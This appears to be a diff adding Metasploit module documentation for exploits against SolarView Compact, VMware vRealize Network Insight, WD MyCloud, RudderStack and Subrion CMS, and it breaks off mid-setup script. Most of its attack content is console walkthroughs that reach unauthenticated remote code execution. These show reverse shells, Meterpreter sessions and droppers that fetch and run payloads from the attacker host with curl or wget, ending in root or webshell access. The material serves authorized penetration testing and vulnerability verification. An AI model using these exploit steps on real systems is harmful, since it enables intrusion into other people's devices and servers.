+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > info
+
+       Name: SolarView Compact unauthenticated remote command execution vulnerability.
+     Module: exploit/linux/http/solarview_unauth_rce_cve_2023_23333
+   Platform: PHP, Unix, Linux
+       Arch: php, cmd, armle, x64
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-05-15
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.201.55   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
+                                        sploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The SolarView endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machin
+                                      e or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+
+  When TARGET is 0:
+
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left un
+                                       set.
+
+Payload information:
+
+Description:
+  CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.
+  This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application
+  via vulnerable endpoint `downloader.php`.
+  After exploitation, an attacker will have full access with the same user privileges under
+  which the webserver is running (typically as user `contec`).
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-23333
+  https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333
+```
+## Options
+### TARGETURI
+The uripath to the `SolarView Compact` web application. Default set is to `/`.
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+## Scenarios
+### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 0
+target => 0
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.55:80 can be exploited.
+[+] The target is vulnerable. SolarView Compact ver.6.00
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.55
+[+] Deleted EearlCwpEMWf.php
+[*] Meterpreter session 8 opened (192.168.201.8:4444 -> 192.168.201.55:35158) at 2023-08-27 21:46:59 +0000
+
+meterpreter > getuid
+Server username: contec
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-78-generic #85-Ubuntu SMP Fri Jul 7 15:25:09 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+### Ubuntu 22.04 Unix Command -  cmd/unix/reverse_bash
+```
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 1
+target => 1
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.55:80 can be exploited.
+[+] The target is vulnerable. SolarView Compact ver.6.00
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.55:39726) at 2023-08-27 21:48:23 +0000
+
+uname -a
+Linux cuckoo 5.15.0-78-generic #85-Ubuntu SMP Fri Jul 7 15:25:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=1002(contec) gid=0(root) groups=0(root)
+```
+### Ubuntu 22.04 Linux Dropper -  linux/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 2
+target => 2
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set srvport 8080
+srvport => 8080
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.55:80 can be exploited.
+[+] The target is vulnerable. SolarView Compact ver.6.00
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/MjK0wR
+[*] Client 192.168.201.55 (Wget/1.21.2) requested /MjK0wR
+[*] Sending payload to 192.168.201.55 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 192.168.201.55
+[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.55:33428) at 2023-08-27 21:50:25 +0000
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: contec
+meterpreter > sysinfo
+Computer     : 192.168.201.55
+OS           : Ubuntu 22.04 (Linux 5.15.0-78-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+```
+### Kali Linux 2023.3 Linux Dropper -  linux/armle/meterpreter_reverse_tcp
+To simulate and test the ARM 32-bit architecture using a Raspberry PI with ARM-32 bit support installed.
+```
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set target 2
+target => 2
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set payload linux/armle/meterpreter_reverse_tcp
+payload => linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > set srvport 8080
+srvport => 8080
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit
+
+msf6 exploit(linux/http/solarview_unauth_rce_cve_2023_23333) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.8:80 can be exploited.
+[+] The target is vulnerable. SolarView Compact ver.6.00
+[*] Executing Linux Dropper for linux/armle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/ELImHODHJZuf
+[*] Client 192.168.201.8 (Wget/1.21.3) requested /ELImHODHJZuf
+[*] Sending payload to 192.168.201.8 (Wget/1.21.3)
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.8:44122) at 2023-08-28 06:36:11 +0000
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: contec
+meterpreter > sysinfo
+Computer     : 192.168.201.8
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter >
+```
+## Limitations
+There are no limitations, but be aware of the fact that `x64` support for this module is only added for test purposes.
+When exploiting the module in the wild, you should use `armle` payloads in case of target setting 2 (Linux Dropper).
@@ -0,0 +1,138 @@
+## Vulnerable Application
+
+VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection
+when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a
+remote unauthenticated attacker to execute arbitrary commands on the underlying operating system
+as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
+VMware has evaluated the severity of this issue to be in the Critical severity range with a
+maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
+context of `root` on the appliance.
+VMWare versions 6.2 to 6.10 are vulnerable.
+
+This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+Successfully tested against version 6.8.0.
+
+### Install
+
+The OVA file can be downloaded from the VMware Customer Connect portal.
+
+1. Import the file VMware-vRealize-Network-Insight-6.8.0.1666364233-platform.ova into VMware Fusion
+2. Login with the given credentials `consoleuser:console`
+3. Run the `setup` command to begin setup
+
+Starting Step 1/4: Create User Passwords
+1. Enter and re-enter SSH_User_Password: `notpassword`
+2. Enter and re-enter CLI_User_Password: `notpassword`
+
+Starting Step 2/4: Network Configuration:
+1. Enter IP_Family: `ipv4`
+2. Enter IP_Address: `192.168.1.60`
+3. Enter Default_Gateway: `192.168.1.254`
+4. Enter DNS: `4.2.2.4 8.8.8.8`
+5. Enter Domain_Search: `example.com`
+6. Save configuration: `y`
+
+Starting Step 3/3: Network Time Server Configuration:
+1. Is the Network Time Security supported for NTP servers? `n`
+2. Enter NTP servers: `0.us.pool.ntp.org`
+
+Step 4/4: Web-Proxy (Optional Configuration)
+1. Configure web proxy?: `n`
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/http/vmware_vrni_rce_cve_2023_20887`
+1. Do: `set rhost [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `set FETCH_SRVHOST [ip]`
+1. Do: `run`
+1. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware vRealize Network Insight 6.8.0 1666364233
+
+```
+msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
+rhost => 192.168.1.60
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.67
+lhost => 192.168.1.67
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.67
+FETCH_SRVHOST => 192.168.1.67
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options
+
+Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.1.60     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST       192.168.1.67     yes       Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.1.67     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 192.168.1.67:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.60:443 can be exploited.
+[+] The target is vulnerable. VMWare Aria Operations for Networks (vRealize Network Insight) version 6.8.0 was found.
+[*] Executing Unix (In-Memory) with curl -so ./yjUczQeXbCf http://192.168.1.67:8080/VtUnMtEdkI5A0Lv6Y2zkFw; chmod +x ./yjUczQeXbCf; ./yjUczQeXbCf &
+[*] Attempting to execute shell
+[*] Sending stage (3045348 bytes) to 192.168.1.60
+[*] Meterpreter session 9 opened (192.168.1.67:4444 -> 192.168.1.60:52370) at 2023-07-20 14:50:13 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.60
+OS           : Ubuntu 18.04 (Linux 5.4.0-126-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,187 @@
+## Vulnerable Application
+This module exploits authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in
+Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user.
+
+The module first performs a check to see if the target is WD MyCloud.
+If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi.
+If the server responds as expected (with a 404 response), the module assesses the vulnerability status by attempting to exploit
+a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command.
+This is done via a crafted POST request to /web/google_analytics.php where the command is injected into the `arg` POST parameter.
+
+If the server is vulnerable, the same command injection vector is leveraged to execute the payload.
+
+This module has been successfully tested against Western Digital MyCloud version 2.30.183.
+
+Note: based on the available disclosures, it seems that the command injection vector (CVE-2016-10108) might be exploitable
+without the authentication bypass (CVE-2018-17153) on versions before 2.21.126.
+The obtained results on 2.30.183 imply that the patch for CVE-2016-10108 did not actually remove
+the command injection vector, but only prevented unauthenticated access to it.
+However, since older versions will also be vulnerable to CVE-2018-17153, this module always chains exploits for both issues.
+
+- CVE-2016-10108 disclosure and PoC:
+https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
+
+- CVE-2018-17153 disclosure and Poc:
+https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/
+
+
+## Installation Information
+Western Digital no longer seems to offer older firmware versions for download to non-customers.
+[This commnity post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533)
+contains download links to older firmware versions as well as to the source code, but only the links to the source code still work.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to WD MyCloud. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Unix In-Memory
+1   Linux Dropper
+```
+
+## Scenarios
+### Western Digital MyCloud 2.30.183 - Unix In-Memory
+```
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to WD MyCloud
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
+   LPORT  6000             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.10.18:6000 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
+[*] 10.10.10.45:443 - Attempting to execute echo tLD1sR3mLQXV1AYFuHV46x5...
+[+] The target is vulnerable. The target executed the echo command.
+[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
+[*] Command shell session 1 opened (10.10.10.18:6000 -> 10.10.10.45:45402) at 2023-07-26 13:51:06 +0000
+id
+uid=0(root) gid=0(root) groups=0(root)
+head /usr/local/config/config.xml
+<config>
+	<sw_ver_1>2.30.183</sw_ver_1>
+	<sw_ver_2>2.30.183.0116.2018</sw_ver_2>
+	<hw_ver>WDMyCloudEX4100</hw_ver>
+	<eula>1</eula>
+	<language>0</language>
+	<registered>0</registered>
+	<eula_fw>0</eula_fw>
+	<eula_apps>0</eula_apps>
+	<analytics>0</analytics>
+```
+### Western Digital MyCloud 2.30.183 - Linux Dropper
+```
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 
+
+Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to WD MyCloud
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/armle/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
+   LPORT  6001             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.10.18:6001 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
+[*] 10.10.10.45:443 - Attempting to execute echo gkmp1ak8jprpqinbvmN84QXaWfgirEt...
+[+] The target is vulnerable. The target executed the echo command.
+[*] Using URL: http://10.10.10.18:8080/xFQRlaZ5ODY9ZQa
+[*] Client 10.10.10.45 (curl/7.42.1) requested /xFQRlaZ5ODY9ZQa
+[*] Sending payload to 10.10.10.45 (curl/7.42.1)
+[*] Sending stage (934728 bytes) to 10.10.10.45
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Meterpreter session 2 opened (10.10.10.18:6001 -> 10.10.10.45:43738) at 2023-07-26 13:51:59 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 10.10.10.45
+OS           :  (Linux 3.10.39)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+```
@@ -32,8 +32,16 @@ If authentication is required, then the `USERNAME` and `PASSWORD` options can be
 complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form
 of a JWT can be set using the `TOKEN` option. This module does not support authentication using a client certificate.

+Verified against 1.12.1, 1.12.1-RC2, and 1.20.0
+
 ### Configuring a Vulnerable Environment

+#### Docker
+
+```
+docker run -p 8443:8443 -d apache/nifi:1.20.0
+```
+
 #### Windows

 1. Download the NiFi binaries zip file from [nifi.apache.org](https://nifi.apache.org/download.html).
@@ -0,0 +1,63 @@
+## Vulnerable Application
+
+RudderStack is an open-source Customer Data Platform (CDP) that helps organizations collect,
+unify, and route customer data to various destinations.
+A Customer Data Platform is a software system that centralizes and manages customer data from multiple sources,
+providing a unified view of customer interactions and behaviors.
+RudderStack is an independent, stand-alone system with a dependency only on the database (PostgreSQL).
+Its backend is written in Go with a rich UI written in React.js.
+
+This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's `rudder-server`,
+an open-source Customer Data Platform (CDP). The vulnerability affects versions of `rudder-server` before 1.3.0-rc.1.
+By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgreSQL has superuser permissions by default.
+This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
+Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.
+
+**Note: The backend code of rudder-server is written with Golang and can also be compiled for Windows.
+Due to the insufficient build instructions for Windows platforms, the Windows target is disabled in this exploit module.**
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Download [docker-compose.yml](https://raw.githubusercontent.com/rudderlabs/rudder-server/master/rudder-docker.yml) file.
+2. Replace `<your_workspace_token>` in this file with your workspace workspace-token
+Check [here](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token)
+for obtaining workspace-token.
+3. Edit `rudder-server:latest` version as `rudder-server:1.2.5` inside the docker-compose.yml file.
+4. Run `docker compose -f rudder-docker.yml up -d`
+
+After these steps the rudder-server API will be exposed on the `http://localhost:8080/` address.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/multi/http/rudder_server_sqli_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/multi/http/rudder_server_sqli_rce 
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set rhosts 192.168.1.20
+rhosts => 192.168.1.20
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/rudder_server_sqli_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.10:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
+[*] Detected rudder version: Unknown
+[*] Triggering RCE via crafted SQL query...
+id
+uid=70(postgres) gid=70(postgres) groups=70(postgres),70(postgres)
+
+```
@@ -0,0 +1,632 @@
+## Vulnerable Application
+
+The vulnerability affects:
+
+    * Intelliants Subrion CMS Version less than or equal to 4.2.1 (latest unpatched version as of June 14, 2018)
+
+This module was successfully tested on:
+
+    * Subrion CMS v4.1.0 with Docker on Debian 10
+    * Subrion CMS v4.1.0 with Docker on Windows 10
+    * Subrion CMS v4.2.1 with XAMPP on Windows Server 2016
+    * Subrion CMS v4.2.1 with XAMPP on Windows 10
+    * Subrion CMS v4.2.1 with LAMP on Debian 10
+    * Subrion CMS v4.2.1 with LAMP on Ubuntu 20.04
+
+### Description
+
+This module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower.
+The vulnerability is caused by the `.htaccess` file not preventing the execution of `.pht`, `.phar`, and `.xhtml` files.
+Files with these extensions are not included in the `.htaccess` blacklist, hence these files can be uploaded and executed to
+achieve remote code execution. In this module, a `.phar` file with a randomized name is uploaded and executed to receive a
+Meterpreter session on the target. Afterwards, the file deletes itself, except on Windows OSes.
+
+## Setup
+
+### Subrion CMS v4.1.0 Installation with Docker on any OS
+
+The easiest way to install Subrion CMS v4.1.0 on any operating system would be to use the `docker-compose.yml` script below,
+which is a slightly modified version provided in the [official repo](https://github.com/intelliants/docker-subrion#-via-docker-compose),
+which is also on [DockerHub](https://hub.docker.com/r/intelliants/subrion). The difference is that when container names are specified,
+there is no need to use the MySQL container's IP address when setting up the final stage of the installation.
+
+```yml
+version: '3'
+
+services:
+  subrion:
+    image: intelliants/subrion
+    container_name: subrion
+    links:
+      - subriondb:mysql
+    ports:
+      - 8080:80
+    environment:
+      SUBRION_DB_PASSWORD: secretpass
+
+  subriondb:
+    image: mysql:5.6
+    container_name: subriondb
+    environment:
+      MYSQL_ROOT_PASSWORD: secretpass
+```
+
+Run:
+
+```sh
+docker-compose up
+```
+
+and wait for the containers to complete initialization. Once the containers are up and running, modify
+the `/etc/apache2/conf-enabled/docker-php.conf` file and restart the Apache server by executing the following commands:
+
+```sh
+docker exec subrion bash -c "sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf"
+docker exec subrion bash -c '/etc/init.d/apache2 reload'
+```
+
+The reason for modifying this file is because the default Apache container configuration only allows parsing and execution
+of `.php` files, not `.phar` files. The replacement is as follows:
+
+**From matching only `.php` file extensions**
+
+```html
+<FilesMatch "\.php$">
+    SetHandler application/x-httpd-php
+</FilesMatch>
+```
+
+**to matching both `.php` and `.phar` file extensions:**
+
+```html
+<FilesMatch "\.(php|phar)$">
+    SetHandler application/x-httpd-php
+</FilesMatch>
+```
+
+After this, navigate to `localhost:8080/install` to set up the final installation process.
+Verify that the `Pre-Installation Check` passes, accept the `Subrion License`,
+and then fill in the following fields in the `Configuration` page:
+
+```
+    MySQL Configuration:
+
+    DB Hostname:  subriondb (the MySQL container name)
+    DB Username:  root
+    DB Password:  secretpass
+    DB Name:      subrion
+    DB Port:      3306 (default)
+    Table Prefix: sbr410_ (default)
+
+    Administrator Configuration:
+
+    Username:  admin
+    Password:  123456
+    Confirm:   123456
+    Email:     anyemail@mail.com
+```
+
+Finally, navigate to `http://localhost:8080/panel/` and login as an Administrator to confirm successful setup.
+
+### Subrion CMS v4.2.1 Installation with XAMPP on Windows 10
+
+Install Subrion CMS v4.2.1 with XAMPP by following the steps below:
+
+1. Download and install [XAMPP 7.4.3](https://xampp.en.uptodown.com/windows/download/2196816) or below.
+
+2. Download and expand the [Subrion CMS v4.2.1](https://subrion.org/download/) (or v4.1.5) zip file into the `C:\xampp\htdocs\` folder,
+after deleting the default files within.
+
+3. Modify the `C:\xampp\apache\conf\extra\httpd-xampp.conf` file by changing the lines:
+
+```html
+<FilesMatch "\.php$">
+    SetHandler application/x-httpd-php
+</FilesMatch>
+```
+
+into
+
+```html
+<FilesMatch "\.(php|phar)$">
+    SetHandler application/x-httpd-php
+</FilesMatch>
+```
+
+4. Restart Apache from the XAMPP Control Panel.
+
+5. Now, add a new database with name `subrion` from the PHPMyAdmin page at `http://localhost/phpmyadmin`
+and execute the following SQL code:
+
+```sql
+CREATE DATABASE subrion;
+
+/* select the 'subrion' database and run the following: */
+GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "" WITH GRANT OPTION; FLUSH PRIVILEGES;
+```
+
+6. After this, navigate to `http://localhost/install` to set up the final installation process.
+Verify that the `Pre-Installation Check` passes, accept the `Subrion License`,
+and then fill in the following fields in the `Configuration` page:
+
+```
+    MySQL Configuration:
+
+    DB Hostname:  localhost (default)
+    DB Username:  root
+    DB Password:  (blank password)
+    DB Name:      subrion
+    DB Port:      3306 (default)
+    Table Prefix: sbr421_ (default)
+
+    Administrator Configuration:
+
+    Username:  admin
+    Password:  123456
+    Confirm:   123456
+    Email:     anyemail@mail.com
+```
+
+7. Finally, navigate to `http://localhost:8080/panel/` and login as an Administrator to confirm successful setup.
+
+### Subrion CMS v4.2.1 Installation with LAMP Stack on Debian 10
+
+According to the [official installation page](https://github.com/intelliants/subrion/wiki/Installation),
+the setup for [Subrion CMS v4.2.1](http://tools.subrion.org/get/latest.zip) requires at least:
+
+    - Apache Server 1.3 or above (with `mod_rewrite`) installed
+    - PHP version 5 or above (with extensions GD lib, XML lib, FreeType installed)
+    - MySQL version 4.1 or above
+
+LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above.
+Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be
+to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually
+copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using
+VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.
+
+```sh
+    #!/bin/bash
+
+    # to be able to copy and paste, and add firewall tool
+    sudo apt update -y && sudo apt upgrade -y
